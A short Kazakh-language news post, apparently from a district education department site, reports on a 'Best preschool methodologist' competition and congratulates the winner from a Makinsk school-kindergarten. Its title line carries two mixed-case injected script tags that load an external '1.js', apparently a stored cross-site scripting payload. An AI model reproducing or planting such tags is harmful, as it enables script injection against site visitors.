Мектепке дейінгі ұйымның үздік әдіскері<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

01.11.2022

Ақмола облысы білім басқармасының Бұланды ауданы бойынша  білім бөлімінің әдістемелік кабинеті   «Мектепке дейінгі ұйымның үздік әдіскері» республикалық конкурсының аудандық кезеңін өткізіп облыстық кезеңініне қатысты.Іс-шара әдіскерлердің инновациялық және кәсіби маңызды тәжірибесін анықтауға және таратуға, мектепке дейінгі білім беру жүйесіндегі мәртебесін арттыруға және кәсіби имиджін қалыптастыруға бағытталған.

Байқау барысында қатысушылар өздерінің «Е-портфолиосын», «Әдістемелік шеберлік» бейнероликтерін көрсетті, «Мен әдіскермін» онлайн диалог алаңына қатысты. Байқаудың қорытындысы бойынша аудандық жүлделі І орын және облыстық кезеңінде ІІ орынға - Шакиева Жазира Ондасыновна, Макинск қаласының «Балдырған» мектеп-балабақшасының әдіскері.

Жеңімпазды құттықтаймыз және шығармашылық табыс тілейміз!

(Баитова Г.Р., аудандық әдістемелік кабинетінің әдіскері).

Просмотров: 572


Пікір қосу



Деректерді қолтаңбаға қосу